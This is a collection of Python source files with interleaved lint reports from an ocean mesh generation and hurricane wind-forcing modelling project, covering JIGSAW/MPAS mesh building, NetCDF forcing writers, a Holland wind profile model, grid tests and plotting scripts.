155 - warning: bad-indentation
157 - warning: bad-indentation
159 - warning: bad-indentation
162 - warning: bad-indentation
163 - warning: bad-indentation
164 - warning: bad-indentation
165 - warning: bad-indentation
28 - refactor: too-many-locals
28 - warning: redefined-outer-name
35 - warning: redefined-outer-name
37 - warning: redefined-outer-name
42 - warning: redefined-outer-name
46 - warning: redefined-outer-name
47 - warning: redefined-outer-name
50 - warning: redefined-outer-name
56 - warning: redefined-outer-name
70 - warning: redefined-outer-name
81 - refactor: too-many-arguments
81 - refactor: too-many-positional-arguments
81 - warning: redefined-outer-name
81 - warning: redefined-outer-name
81 - warning: redefined-outer-name
81 - warning: redefined-outer-name
81 - warning: redefined-outer-name
81 - warning: redefined-outer-name
113 - error: used-before-assignment
9 - warning: unused-import
10 - warning: unused-import
13 - warning: unused-import
|
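The core of interpolate_data_to_grid, reduced to a toy problem; note the (lon, lat) axis order and the transposed data array, matching the RegularGridInterpolator call above:

import numpy as np
from scipy import interpolate

lon = np.linspace(0.0, 360.0, 73)   # coarse source grid
lat = np.linspace(-90.0, 90.0, 37)
data = np.cos(np.radians(lat))[:, np.newaxis] * np.ones((37, 73))  # (nlat, nlon)

interp = interpolate.RegularGridInterpolator(
    (lon, lat), data.T, bounds_error=False, fill_value=0.0)

# Unstructured target points, stacked as (lon, lat) pairs like grid_points above.
targets = np.column_stack(([10.0, 200.0], [45.0, -30.0]))
print(interp(targets))  # ~[0.707, 0.866]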
1 #!/usr/bin/env python
2 """
3 This script performs the first step of initializing the global ocean. This
4 includes:
5 Step 1. Build cellWidth array as function of latitude and longitude
6 Step 2. Build mesh using JIGSAW
7 Step 3. Convert triangles from jigsaw format to netcdf
8 Step 4. Convert from triangles to MPAS mesh
9 Step 5. Create vtk file for visualization
10 """
11
12 from __future__ import absolute_import, division, print_function, \
13 unicode_literals
14
15 import subprocess
16 import os
17 import xarray
18 import argparse
19 import matplotlib.pyplot as plt
20
21 from mpas_tools.conversion import convert
22 from mpas_tools.io import write_netcdf
23
24 from jigsaw_to_MPAS.jigsaw_driver import jigsaw_driver
25 from jigsaw_to_MPAS.triangle_jigsaw_to_netcdf import jigsaw_to_netcdf
26 from jigsaw_to_MPAS.inject_bathymetry import inject_bathymetry
27 from jigsaw_to_MPAS.inject_meshDensity import inject_meshDensity
28 from jigsaw_to_MPAS.inject_preserve_floodplain import \
29 inject_preserve_floodplain
30
31 from define_base_mesh import define_base_mesh
32
33
34 def build_mesh(
35 preserve_floodplain=False,
36 floodplain_elevation=20.0,
37 do_inject_bathymetry=False,
38 geometry='sphere',
39 plot_cellWidth=True):
40
41 if geometry == 'sphere':
42 on_sphere = True
43 else:
44 on_sphere = False
45
46 print('Step 1. Build cellWidth array as function of horizontal coordinates')
47 if on_sphere:
48 cellWidth, lon, lat = define_base_mesh.cellWidthVsLatLon()
49 da = xarray.DataArray(cellWidth,
50 dims=['lat', 'lon'],
51 coords={'lat': lat, 'lon': lon},
52 name='cellWidth')
53 cw_filename = 'cellWidthVsLatLon.nc'
54 da.to_netcdf(cw_filename)
55 plot_cellWidth=True
56 if plot_cellWidth:
57 import matplotlib
58 from cartopy import config
59 import cartopy.crs as ccrs
60 matplotlib.use('Agg')
61 fig = plt.figure()
62 fig.set_size_inches(16.0, 8.0)
63 plt.clf()
64 ax = plt.axes(projection=ccrs.PlateCarree())
65 ax.set_global()
66 im = ax.imshow(cellWidth, origin='lower', transform=ccrs.PlateCarree(
67 ), extent=[-180, 180, -90, 90], cmap='jet')
68 ax.coastlines()
69 gl = ax.gridlines(
70 crs=ccrs.PlateCarree(),
71 draw_labels=True,
72 linewidth=1,
73 color='gray',
74 alpha=0.5,
75 linestyle='-')
76 gl.xlabels_top = False
77 gl.ylabels_right = False
78 plt.title('Grid cell size, km')
79 plt.colorbar(im, shrink=.60)
80 plt.savefig('cellWidthGlobal.png')
81
82 else:
83 cellWidth, x, y, geom_points, geom_edges = define_base_mesh.cellWidthVsXY()
84 da = xarray.DataArray(cellWidth,
85 dims=['y', 'x'],
86 coords={'y': y, 'x': x},
87 name='cellWidth')
88 cw_filename = 'cellWidthVsXY.nc'
89 da.to_netcdf(cw_filename)
90
91 print('Step 2. Generate mesh with JIGSAW')
92 if on_sphere:
93 jigsaw_driver(cellWidth, lon, lat)
94 else:
95 jigsaw_driver(
96 cellWidth,
97 x,
98 y,
99 on_sphere=False,
100 geom_points=geom_points,
101 geom_edges=geom_edges)
102
103 print('Step 3. Convert triangles from jigsaw format to netcdf')
104 jigsaw_to_netcdf(msh_filename='mesh-MESH.msh',
105 output_name='mesh_triangles.nc', on_sphere=on_sphere)
106
107 print('Step 4. Convert from triangles to MPAS mesh')
108 write_netcdf(convert(xarray.open_dataset('mesh_triangles.nc')),
109 'base_mesh.nc')
110
111 print('Step 5. Inject correct meshDensity variable into base mesh file')
112 inject_meshDensity(cw_filename=cw_filename,
113 mesh_filename='base_mesh.nc', on_sphere=on_sphere)
114
115 if do_inject_bathymetry:
116 print('Step 6. Injecting bathymetry')
117 inject_bathymetry(mesh_file='base_mesh.nc')
118
119 if preserve_floodplain:
120 print('Step 7. Injecting flag to preserve floodplain')
121 inject_preserve_floodplain(mesh_file='base_mesh.nc',
122 floodplain_elevation=floodplain_elevation)
123
124 print('Step 8. Create vtk file for visualization')
125 args = ['paraview_vtk_field_extractor.py',
126 '--ignore_time',
127 '-l',
128 '-d', 'maxEdges=0',
129 '-v', 'allOnCells',
130 '-f', 'base_mesh.nc',
131 '-o', 'base_mesh_vtk']
132 print("running", ' '.join(args))
133 subprocess.check_call(args, env=os.environ.copy())
134
135 print("***********************************************")
136 print("** The global mesh file is base_mesh.nc **")
137 print("***********************************************")
138
139
140 if __name__ == '__main__':
141 parser = argparse.ArgumentParser()
142 parser.add_argument('--preserve_floodplain', action='store_true')
143 parser.add_argument('--floodplain_elevation', action='store',
144 type=float, default=20.0)
145 parser.add_argument('--inject_bathymetry', action='store_true')
146 parser.add_argument('--geometry', default='sphere')
147 parser.add_argument('--plot_cellWidth', action='store_true')
148 cl_args = parser.parse_args()
149 build_mesh(cl_args.preserve_floodplain, cl_args.floodplain_elevation,
150 cl_args.inject_bathymetry, cl_args.geometry,
151 cl_args.plot_cellWidth)
| 34 - refactor: too-many-locals
41 - refactor: simplifiable-if-statement
34 - refactor: too-many-statements
58 - warning: unused-import
|
1 # Author: Steven Brus
2 # Date: April, 2020
3 # Description: This function writes time-varying forcing data to an input file for the model run.
4
5 import os
6 import numpy as np
7 import netCDF4
8
9 ##################################################################################################
10 ##################################################################################################
11
12 def write_to_file(filename,data,var,xtime):
13
14 if os.path.isfile(filename):
15 data_nc = netCDF4.Dataset(filename,'a', format='NETCDF3_64BIT_OFFSET')
16 else:
17 data_nc = netCDF4.Dataset(filename,'w', format='NETCDF3_64BIT_OFFSET')
18
19 # Find dimensions
20 ncells = data.shape[1]
21 nsnaps = data.shape[0]
22
23 # Declare dimensions
24 data_nc.createDimension('nCells',ncells)
25 data_nc.createDimension('StrLen',64)
26 data_nc.createDimension('Time',None)
27
28 # Create time variable
29 time = data_nc.createVariable('xtime','S1',('Time','StrLen'))
30 time[:,:] = netCDF4.stringtochar(xtime)
31
32 # Set variables
33 data_var = data_nc.createVariable(var,np.float64,('Time','nCells'))
34 data_var[:,:] = data[:,:]
35 data_nc.close()
36
37 ##################################################################################################
38 ##################################################################################################
| 14 - warning: bad-indentation
15 - warning: bad-indentation
16 - warning: bad-indentation
17 - warning: bad-indentation
20 - warning: bad-indentation
21 - warning: bad-indentation
24 - warning: bad-indentation
25 - warning: bad-indentation
26 - warning: bad-indentation
29 - warning: bad-indentation
30 - warning: bad-indentation
33 - warning: bad-indentation
34 - warning: bad-indentation
35 - warning: bad-indentation
21 - warning: unused-variable
|
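A minimal driver for write_to_file, with toy data shaped (nsnaps, nCells) and the 64-character timestamp strings the model expects; the file name is illustrative:

import numpy as np
import write_forcing_file

ncells, nsnaps = 4, 2
data = np.zeros((nsnaps, ncells))  # e.g. zero wind speed everywhere
xtime = np.array(['2020-01-01_00:00:00' + 45 * ' ',
                  '2020-01-02_00:00:00' + 45 * ' '], 'S64')

write_forcing_file.write_to_file('toy_forcing.nc', data, 'windSpeedU', xtime)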
1 from winds_io import import_data
2 from winds_io import output_data
3 from structures import geogrid
4 import sys
5 import numpy as np
6 from winds import parameters
7 from winds import wind_model
8
9 def sim_hurricane():
10 # Read in the input file to check which grid we are using
11 print('Import user inputs')
12 traj_filename, grid_flag, grid_filename, ambient_pressure, holland_b_param = \
13 import_data.read_input_file('hurricane_inputs.txt')
14
15 # Read grid-specific parameters and create grid
16 print('Read-in grid')
17 grid = import_data.initialize_grid(grid_filename, grid_flag)
18
19 # Read hurricane trajectory and set hurricane parameters
20 print('Initialize hurricane trajectory data')
21 curr_hurricane = import_data.initialize_hurricane(traj_filename, ambient_pressure, holland_b_param)
22
23 # Define parameters
24 print('Define parameters')
25 params = define_params(curr_hurricane)
26
27 # Compute winds on grid
28 print('Compute winds')
29 winds = compute_winds(curr_hurricane, params, grid)
30
31 # Output results
32 print('Output results')
33 output_data.write_netcdf('out.nc', curr_hurricane, grid, winds)
34
35 def compute_winds(curr_hurricane, params, grid: geogrid):
36 ntimes = len(curr_hurricane) - 1
37 mywinds = []
38 for it in range(0, ntimes):
39 print('Time iteration %d / %d' % (it + 1, len(curr_hurricane) - 1))
40 mywinds.append(wind_model.WindModel(params, curr_hurricane[it], grid))
41
42 return mywinds
43
44 def define_params(curr_hurricane):
45 lat = []
46 for i in range(0, len(curr_hurricane)):
47 lat.append(curr_hurricane[i].center[1])
48 return parameters.Parameters(np.mean(lat))
49
50
51 if __name__ == "__main__":
52 sim_hurricane()
53
54 print('Program executed successfully')
55 sys.exit(0)
56 # # Read in the input file to check which grid we are using
57 # traj_filename, grid_flag, grid_filename = import_data.read_input_file('hurricane_inputs.txt')
58 #
59 # # Read hurricane trajectory
60 # traj = import_data.read_json(traj_filename)
61 #
62 # # Create trajectory object
63 # curr_hurricane = initialize_hurricane(traj)
64 #
65 # # Read grid-specific parameters
66 # if grid_flag == 1:
67 # xll, yll, cellsize, numcells_lat, numcells_lon = import_data.read_raster_inputs(grid_filename)
68 # else:
69 # coord = import_data.read_netcdf(grid_filename)
70
71 # Create the grid
72
73
| Clean Code: No Issues Detected
|
1 from structures.geogrid import GeoGrid
2
3 def test_geogrid():
4 lon = -106.0
5 lat = 35
6 nlon = 8
7 nlat = 4
8 cellsize = 1.0
9 defaultValue = -1.0
10 grid = GeoGrid(lon,lat,nlon,nlat,cellsize,defaultValue = defaultValue)
11 assert grid.lon == lon
12 assert grid.lat == lat
13 assert grid.nlon == nlon
14 assert grid.nlat == nlat
15 assert grid.cellsize == cellsize
16 assert defaultValue == defaultValue
17
18 l = int(nlat/2)
19 k = int(nlon/2)
20 for j in range(0,l):
21 for i in range(0,k):
22 grid.put(i,j,1.0)
23 for i in range(k,nlon):
24 grid.put(i,j,2.0)
25 for j in range(l,nlat):
26 for i in range(0,k):
27 grid.put(i,j,3.0)
28 for i in range(k,nlon):
29 grid.put(i,j,4.0)
30
31 for j in range(0,l):
32 for i in range(0,k):
33 assert grid.getByIndex(i,j) == 1.0
34 for i in range(k,nlon):
35 assert grid.getByIndex(i,j) == 2.0
36 for j in range(l,nlat):
37 for i in range(0,k):
38 assert grid.getByIndex(i,j) == 3.0
39 for i in range(k,nlon):
40 assert grid.getByIndex(i,j) == 4.0
41
42 testcell = [3,3]
43 center = grid.getCenter(testcell[0],testcell[1])
44 centerx = lon + (testcell[0]+0.5)*cellsize
45 centery = lat + (testcell[1]+0.5)*cellsize
46 assert center[0] == centerx
47 assert center[1] == centery
48
49 index = grid.getIndex(centerx,centery)
50 assert index[0] == testcell[0]
51 assert index[1] == testcell[1]
52
53 value = grid.getByIndex(testcell[0],testcell[1])
54 testcoords = grid.getCenter(testcell[0],testcell[1])
55 valuec = grid.getByCoordinate(testcoords[0],testcoords[1])
56 assert value == valuec
57
58 origin = grid.getOrigin()
59 assert origin[0] == lon
60 assert origin[1] == lat
61
62 bounds = grid.bounds
63 assert bounds[0] == lon
64 assert bounds[1] == lon + nlon*cellsize
65 assert bounds[2] == lat
66 assert bounds[3] == lat + nlat*cellsize
67
68 assert grid.indexInside(-1,l) == False
69 assert grid.indexInside(k,l) == True
70 assert grid.indexInside(nlon,l) == False
71 assert grid.indexInside(k,-1) == False
72 assert grid.indexInside(k,l) == True
73 assert grid.indexInside(k,nlat) == False
74
75 assert grid.coordinateInside(bounds[0]+cellsize,bounds[2]+cellsize) == True
76 assert grid.coordinateInside(bounds[0]-cellsize,bounds[2]+cellsize) == False
77 assert grid.coordinateInside(bounds[0]+cellsize,bounds[2]-cellsize) == False
78
79 assert grid.coordinateInside(bounds[1]-cellsize,bounds[2]+cellsize) == True
80 assert grid.coordinateInside(bounds[1]-cellsize,bounds[2]-cellsize) == False
81 assert grid.coordinateInside(bounds[1]+cellsize,bounds[2]+cellsize) == False
82
83 assert grid.coordinateInside(bounds[0]+cellsize,bounds[3]-cellsize) == True
84 assert grid.coordinateInside(bounds[0]+cellsize,bounds[3]+cellsize) == False
85 assert grid.coordinateInside(bounds[0]-cellsize,bounds[3]+cellsize) == False
86
87 assert grid.coordinateInside(bounds[1]-cellsize,bounds[3]-cellsize) == True
88 assert grid.coordinateInside(bounds[1]-cellsize,bounds[3]+cellsize) == False
89 assert grid.coordinateInside(bounds[1]+cellsize,bounds[3]-cellsize) == False
90
91 grid.clear()
92 for j in range(0,nlat):
93 for i in range(0,nlon):
94 assert grid.getByIndex(i,j) == 0.0
95
| 3 - refactor: too-many-locals
16 - refactor: comparison-with-itself
3 - refactor: too-many-branches
3 - refactor: too-many-statements
|
1 import pytest
2 from hurricane_model.hurricane import Hurricane
3
4 def test_hurricane():
5 center = [1.0,2.0] # Position of the eye (lon,lat) in decimal degrees.
6 extent = 100.0 # The maximum extent of the hurricane in kilometers.
7 vforward = [3.0, 4.0] # Forward velocity [ve, vn] in km/hr.
8 pcentral = 200.0 # Central pressure in millibars.
9 deltap = 50.0 # Pressure difference in millibars.
10 vmax = 15.0 # The maximum gradient wind speed in km/hr.
11 b = 1.2 # The Holland parameter, conventionally in the range [0.5,2.5].
12
13 hurricane = Hurricane(center,extent)
14 hurricane.setVForward(vforward[0],vforward[1])
15 hurricane.setPCentral(pcentral)
16 hurricane.setDeltaP(deltap)
17 hurricane.setVMax(vmax)
18 hurricane.setB(b)
19
20 assert hurricane.center == center
21 assert hurricane.extent == extent
22 assert hurricane.vforward == vforward
23 assert hurricane.pcentral == pcentral
24 assert hurricane.deltap == deltap
25 assert hurricane.vmax == vmax
26 assert hurricane.b == b
| 1 - warning: unused-import
|
1 # Author: Steven Brus
2 # Date April, 2020
3 # Description:
4 # This creates a "dummy" time varying forcing file
5 # with zero wind zero atmospheric pressure perturbation
6 # for the tidal spinup run.
7 #
8 # The tidal spinup is run using this "dummy" atmospheric forcing
9 # because the time varying atmospheric forcing for the
10 # forward run requires information in the restart file.
11 # The inclusion of this additional information in the restart
12 # file is triggered by the use of time varying atmospheric forcing
13 # in the tidal spinup.
14
15 import netCDF4
16 import matplotlib.pyplot as plt
17 import numpy as np
18 import glob
19 import pprint
20 import datetime
21 import os
22 import yaml
23 import subprocess
24 import argparse
25 import write_forcing_file
26 plt.switch_backend('agg')
27
28 ##################################################################################################
29 ##################################################################################################
30
31 if __name__ == '__main__':
32
33 parser = argparse.ArgumentParser()
34 parser.add_argument('--start_time')
35 parser.add_argument('--spinup_length')
36 args = parser.parse_args()
37
38 # Files to interpolate to/from
39 grid_file = './mesh.nc'
40 forcing_file = 'spinup_atmospheric_forcing.nc'
41
42 # Set up timestamps
43 # (3 time snaps are needed because new data will be read in at the end of the simulation)
44 dtformat = '%Y-%m-%d_%H:%M:%S'
45 start_time = datetime.datetime.strptime(args.start_time,dtformat)
46 spinup_length = float(args.spinup_length)
47 xtime = []
48 xtime.append(args.start_time+45*' ')
49 next_time = start_time + datetime.timedelta(days=spinup_length)
50 xtime.append(datetime.datetime.strftime(next_time,dtformat)+45*' ')
51 next_time = next_time + datetime.timedelta(days=spinup_length)
52 xtime.append(datetime.datetime.strftime(next_time,dtformat)+45*' ')
53 xtime = np.array(xtime,'S64')
54 print(xtime)
55
56 # Get grid from grid file
57 grid_nc = netCDF4.Dataset(grid_file,'r')
58 lon_grid = grid_nc.variables['lonCell'][:]
59 ncells = lon_grid.size
60
61 # Initialize atmospheric forcing fields
62 u_data = np.zeros((3,ncells))
63 v_data = np.zeros((3,ncells))
64 p_data = np.zeros((3,ncells)) + 101325.0
65 print(p_data.shape)
66
67 # Write to NetCDF file
68 subprocess.call(['rm',forcing_file])
69 write_forcing_file.write_to_file(forcing_file,u_data,'windSpeedU',xtime)
70 write_forcing_file.write_to_file(forcing_file,v_data,'windSpeedV',xtime)
71 write_forcing_file.write_to_file(forcing_file,p_data,'atmosPressure',xtime)
72
| 33 - warning: bad-indentation
34 - warning: bad-indentation
35 - warning: bad-indentation
36 - warning: bad-indentation
39 - warning: bad-indentation
40 - warning: bad-indentation
44 - warning: bad-indentation
45 - warning: bad-indentation
46 - warning: bad-indentation
47 - warning: bad-indentation
48 - warning: bad-indentation
49 - warning: bad-indentation
50 - warning: bad-indentation
51 - warning: bad-indentation
52 - warning: bad-indentation
53 - warning: bad-indentation
54 - warning: bad-indentation
57 - warning: bad-indentation
58 - warning: bad-indentation
59 - warning: bad-indentation
62 - warning: bad-indentation
63 - warning: bad-indentation
64 - warning: bad-indentation
65 - warning: bad-indentation
68 - warning: bad-indentation
69 - warning: bad-indentation
70 - warning: bad-indentation
71 - warning: bad-indentation
18 - warning: unused-import
19 - warning: unused-import
21 - warning: unused-import
22 - warning: unused-import
|
1 from enum import Enum
2 import numpy as np
3 import winds.parameters as Parameters
4 import hurricane_model as Hurricane
5 import structures as Geogrid
6 import matplotlib.pyplot as plt
7 import math
8
9
10 class PROFILE_TYPE(Enum):
11 HOLLAND = 'holland'
12 WILLOUGHBY = 'willoughby'
13
14 class WindModel:
15 def __init__(self, params: Parameters, curr_hurricane: Hurricane, grid: Geogrid):
16 self.profile_type = params.wind_profile_type
17 if self.profile_type == PROFILE_TYPE.HOLLAND:
18
19 # Distance between the hurricane eye and the grid points
20 # Great circle distance in km
21 r = np.power(np.sin((grid.lat - curr_hurricane.center[1]) * 0.5), 2) + \
22 np.cos(grid.lat) * np.cos(curr_hurricane.center[1]) * \
23 np.power(np.sin((grid.lon - curr_hurricane.center[0]) * 0.5), 2)
24 r = 2.0 * params.earth_radius * np.arcsin(np.sqrt(r))
25
26 # Compute pressure
27 self.pressure_profile = holland_pressure_profile(curr_hurricane, r)
28
29 # Compute wind speed
30 self.wind_speed_profile = holland_windspeed_profile(params, curr_hurricane, r)
31
32 # plt.scatter(grid.lon, grid.lat, s=10., c=self.wind_speed_profile, alpha=1.)
33 # plt.show()
34
35 # Compute wind components
36 self.u, self.v = compute_components(self.wind_speed_profile, curr_hurricane, grid)
37
38 else:
39 raise 'Profile models other than Holland are not currently supported.'
40
41
42 def holland_pressure_profile(hurricane: Hurricane, r: np.ndarray):
43 """
44 :param hurricane: class type Hurricane
45 :param r: distance between the eye of the hurricane and the grid points in km
46 """
47 return hurricane.pcentral + hurricane.deltap * np.exp(-np.power(hurricane.extent / r ,hurricane.b))
48
49
50 def holland_windspeed_profile(params: Parameters, hurricane: Hurricane, r: np.ndarray, coriolis=False):
51 """
52 :param params: class parameters
53 :param hurricane: class Hurricane
54 :param r: distance between the eye of the hurricane and the grid points in km
55 :param coriolis: coriolis factor in rad/hrs
56 """
57
58 # Holland equation assumes:
59 # deltap in Pa
60 # density in kg/m3
61 # and returns m/s
62 units_factor = 100. # To convert the deltap from mbar to Pascals
63
64
65 y = np.power(hurricane.extent / r, hurricane.b)
66 exp_term = units_factor*(hurricane.deltap / params.rho) * hurricane.b * y * np.exp(-y)
67 if coriolis is True:
68 v = np.sqrt(exp_term + 0.25 * np.power(r * params.f, 2)) + 0.5 * r * params.f
69 else:
70 v = np.sqrt(exp_term)
71
72 v *= 3.6 # Conversion from m/s to km/h
73
74 return v
75
76 def compute_components(wind_speed_profile, curr_hurricane: Hurricane, grid: Geogrid) -> (np.ndarray, np.ndarray):
77 # Compute components of vg
78 theta = np.arctan2(grid.lat - curr_hurricane.center[1], grid.lon - curr_hurricane.center[0])
79 theta += math.pi * 0.5
80 vg_x = wind_speed_profile * np.cos(theta)
81 vg_y = wind_speed_profile * np.sin(theta)
82
83 # Compute total velocity
84 ratio = wind_speed_profile / curr_hurricane.vmax
85 u = vg_x + curr_hurricane.vforward[0] * ratio
86 v = vg_y + curr_hurricane.vforward[1] * ratio
87
88 return u, v | 43 - warning: bad-indentation
47 - warning: bad-indentation
51 - warning: bad-indentation
62 - warning: bad-indentation
65 - warning: bad-indentation
66 - warning: bad-indentation
67 - warning: bad-indentation
68 - warning: bad-indentation
69 - warning: bad-indentation
70 - warning: bad-indentation
72 - warning: bad-indentation
74 - warning: bad-indentation
39 - error: raising-bad-type
14 - refactor: too-few-public-methods
6 - warning: unused-import
|
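The Holland gradient-wind formula from holland_windspeed_profile, evaluated standalone over a radius sweep (constants are made-up but plausible; deltap is converted from mbar to Pa, and the result from m/s to km/h, as above):

import numpy as np

rho, b, extent, deltap = 1.15, 1.2, 40.0, 50.0  # kg/m^3, Holland B, km, mbar

def holland_speed(r):
    y = (extent / r) ** b
    v = np.sqrt(100.0 * (deltap / rho) * b * y * np.exp(-y))  # m/s
    return v * 3.6                                            # km/h

for r in (10.0, 40.0, 100.0):
    print(r, holland_speed(r))  # without Coriolis the speed peaks at r = extent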
1 from geopy.distance import geodesic
2
3 def geodistkm(x1,y1,x2,y2):
4 '''
5 Returns the geodesic distance in km given two pairs of (lon, lat) coordinates.
6 Note: Because it uses geopy, the coordinate order is reversed to (lat,lon)
7 before calling the geopy function.
8 :param x1: lon of the first point.
9 :param y1: lat of the first point.
10 :param x2: lon of the second point.
11 :param y2: lat of the second point.
12 :return: Geodesic distance between the two points in km.
13 '''
14 return geodesic((y1,x1),(y2,x2)).km
| Clean Code: No Issues Detected
|
1 import numpy as np
2 from netCDF4 import Dataset
3 import matplotlib.pyplot as plt
4 import matplotlib
5 matplotlib.use('Agg')
6
7 fig = plt.gcf()
8 nRow = 1 # 2
9 nCol = 5
10 nu = ['1', '5', '10', '100', '200']
11 iTime = [0]
12 time = ['20']
13
14 # ---nx,ny for 10 km
15 #nx = 16
16 #ny = 50
17
18 # ---nx,ny for 4 km
19 nx = 40
20 ny = 126
21
22 # ---nx,ny for 1 km
23 #nx = 160
24 #ny = 500
25
26 fig, axs = plt.subplots(nRow, nCol, figsize=(
27 2.1 * nCol, 5.0 * nRow), constrained_layout=True)
28
29 for iCol in range(nCol):
30 for iRow in range(nRow):
31 ncfile = Dataset('output_' + str(iCol + 1) + '.nc', 'r')
32 var = ncfile.variables['temperature']
33 var1 = np.reshape(var[iTime[iRow], :, 0], [ny, nx])
34 # --- flip in y-dir
35 var = np.flipud(var1)
36
37 # --- Every other row in y needs to average two neighbors in x on planar hex mesh
38 var_avg = var
39 for j in range(0, ny, 2):
40 for i in range(0, nx - 2):
41 var_avg[j, i] = (var[j, i + 1] + var[j, i]) / 2.0
42
43 if nRow == 1:
44 ax = axs[iCol]
45 if nRow > 1:
46 ax = axs[iRow, iCol]
47 dis = ax.imshow(
48 var_avg,
49 extent=[
50 0,
51 160,
52 0,
53 500],
54 cmap='jet',
55 vmin=11.8,
56 vmax=13.0)
57 ax.set_title("day " + time[iRow] + ", " + r"$\nu_h=$" + nu[iCol])
58 ax.set_xticks(np.arange(0, 161, step=40))
59 ax.set_yticks(np.arange(0, 501, step=50))
60
61 if iRow == nRow - 1:
62 ax.set_xlabel('x, km')
63 if iCol == 0:
64 ax.set_ylabel('y, km')
65 if iCol == nCol - 1:
66 if nRow == 1:
67 fig.colorbar(dis, ax=axs[nCol - 1], aspect=40)
68 if nRow > 1:
69 fig.colorbar(dis, ax=axs[iRow, nCol - 1], aspect=40)
70 ncfile.close()
71
72 if nx == 16:
73 res = '10'
74 if nx == 40:
75 res = '4'
76 if nx == 160:
77 res = '1'
78
79 plt.savefig("sections_baroclinic_channel_" + res + "km.png")
| 47 - error: possibly-used-before-assignment
79 - error: possibly-used-before-assignment
|
1 import numpy as np
2
3 class GeoGrid:
4 def __init__(self, lon: np.ndarray, lat: np.ndarray):
5 """
6 Constructor.
7 :param lon: longitude of the grid in radians, as numpy array
8 :param lat: latitude of the grid in radians, as numpy array
9 """
10 self.lon = lon
11 self.lat = lat
12 self.ncells = len(lon)
13
14
15
16
17 # '''
18 # A class that defines the structure, location, extent, and resolution of a geographic grid.
19 # The grid is not the same as a geospatial raster, but is related in that, while a raster numbers vertical cells
20 # starting from the top of the raster, the grid cells are numbered from the bottom. That is, a raster is oriented
21 # like a raster of pixels, while the geographic grid is oriented like a regular Cartesian grid of cells. The
22 # data in the grid is contained in a two-dimensional NumPy array. Because of this, the grid cell is indexed like
23 # a Fortran array (column major indexing, i.e. i=column, j=row).
24 # '''
25 # def __init__(self, lon, lat, nlon, nlat, cellsize, defaultValue=0.0):
26 # '''
27 # Constructor.
28 # :param lon: Lower-left longitude of the grid in decimal degrees.
29 # :param lat: Lower-left latitude of the grid in decimal degrees.
30 # :param nlon: The number of cells in longitude.
31 # :param nlat: The number of cells in latitude.
32 # :param cellsize: The size of a cell in the grid.
33 # '''
34 # self.lon = lon
35 # self.lat = lat
36 # self.nlon = nlon
37 # self.nlat = nlat
38 # self.cellsize = cellsize
39 # self.defaultValue = defaultValue
40 # self.grid = np.zeros([nlat,nlon],dtype=np.float64)
41 # self.bounds = [self.lon, self.lon + self.nlon*self.cellsize,
42 # self.lat, self.lat + self.nlat*self.cellsize]
43 #
44 #
45 # def put(self,i,j,v):
46 # if self.indexInside(i,j):
47 # self.grid[self.nlat-j-1,i]=v
48 #
49 # def getByIndex(self,i,j):
50 # if self.indexInside(i,j):
51 # return self.grid[self.nlat-j-1,i]
52 # else:
53 # return self.defaultValue
54 #
55 # def getByCoordinate(self,lon,lat):
56 # if self.coordinateInside(lon,lat):
57 # index = self.getIndex(lon,lat)
58 # return self.getByIndex(index[0],index[1])
59 # else:
60 # return self.defaultValue
61 #
62 # def clear(self):
63 # self.grid.fill(0.0)
64 #
65 # def indexInside(self,i,j):
66 # if i>=0 and i<self.nlon and j>=0 and j<self.nlat:
67 # return True
68 # else:
69 # return False
70 #
71 # def coordinateInside(self,lon,lat):
72 # if lon>=self.bounds[0] and lon<=self.bounds[1] and lat>=self.bounds[2] and lat<=self.bounds[3]:
73 # return True
74 # else:
75 # return False
76 #
77 # def getOrigin(self):
78 # return [self.lon,self.lat]
79 #
80 # def getCenter(self,i,j):
81 # clon = self.lon + (i+0.5)*self.cellsize
82 # clat = self.lat + (j+0.5)*self.cellsize
83 # return [clon,clat]
84 #
85 # def getIndex(self,lon,lat):
86 # i = int((lon-self.lon)/self.cellsize)
87 # j = int((lat-self.lat)/self.cellsize)
88 # return [i,j]
89 #
| 3 - refactor: too-few-public-methods
|
1 ../comparison.py | 1 - error: syntax-error
|
1 import sys
2 import numpy as np
3 import matplotlib.pyplot as plt
4 #from matplotlib.patches import Circle
5 import math
6
7 def W(x, y):
8 """Return the wind vector at position (x, y)."""
9 r = np.sqrt(x*x+y*y)
10 v = V(r)
11 if r>0:
12 costheta = x/r
13 sintheta = y/r
14 return [-sintheta*v,costheta*v]
15 else:
16 return [0,0]
17
18 def V(r):
19 return 2*r*r*np.exp(-r)
20
21 def example(n):
22 # Grid of x, y points
23 nx, ny = n, n
24 x = np.linspace(-2, 2, nx)
25 y = np.linspace(-2, 2, ny)
26
27 # Wind field vector components U,V
28 U, V = np.zeros((ny, nx)), np.zeros((ny, nx))
29 for j in range(ny-1,-1,-1):
30 for i in range(0,nx):
31 vv = W(x[i],y[j])
32 U[j,i]=vv[0]
33 V[j,i]=vv[1]
34
35 fig = plt.figure()
36 ax1 = fig.add_subplot(1,1,1)
37
38 # Plot the streamlines.
39 ax1.streamplot(x, y, U, V, color=np.sqrt(U*U+V*V), cmap='Spectral')
40 ax1.set_xlabel('$x$')
41 ax1.set_ylabel('$y$')
42 ax1.set_xlim(-2,2)
43 ax1.set_ylim(-2,2)
44 ax1.set_aspect('equal')
45 plt.title('Tangential Wind Vectors')
46 plt.show()
47
48 if __name__=='__main__':
49 example(8)
50
| 11 - refactor: no-else-return
28 - warning: redefined-outer-name
1 - warning: unused-import
5 - warning: unused-import
|
1 from winds.velocities import Velocities
2 import math
3
4 def test_velocities():
5 # Forward velocity in km/hr.
6 vfe = -1.0 # Eastward .
7 vfn = 0.0 # Northward.
8 vg = 1.0 # Tangential gradient wind speed in km/hr.
9
10 veloc = Velocities(vfe,vfn)
11 r = 1.0 # Unit circle about the origin.
12 np = 360
13 dtheta = 2*math.pi/np
14 with open('test_velocities_out.csv','wt') as out:
15 out.write('x,y,vx,vy,r,theta_degrees\n')
16 for i in range(0,np):
17 theta = i*dtheta
18 degrees = 180.0*theta/math.pi
19 x = r*math.cos(theta)
20 y = r*math.sin(theta)
21 v = veloc.compute_wind_vector(vg,x,y)
22 out.write(str(x)+','+str(y)+','+str(v[0])+','+str(v[1])+','+str(r)+','+str(degrees)+'\n')
23
| 14 - warning: unspecified-encoding
|
1 import datetime
2
3 class Hurricane:
4 def __init__(self, center: tuple, extent: float, pcentral: float, deltap: float,
5 vmax: float, b: float, time: float, initial_datetime: datetime.datetime):
6 self.center = center # Position of the eye (lon,lat) in radians as tuple.
7 self.extent = extent # The maximum extent of the hurricane in kilometers.
8 self.vforward = [] # Forward velocity [ve, vn] in km/hr.
9 self.pcentral = pcentral # Central pressure in millibars.
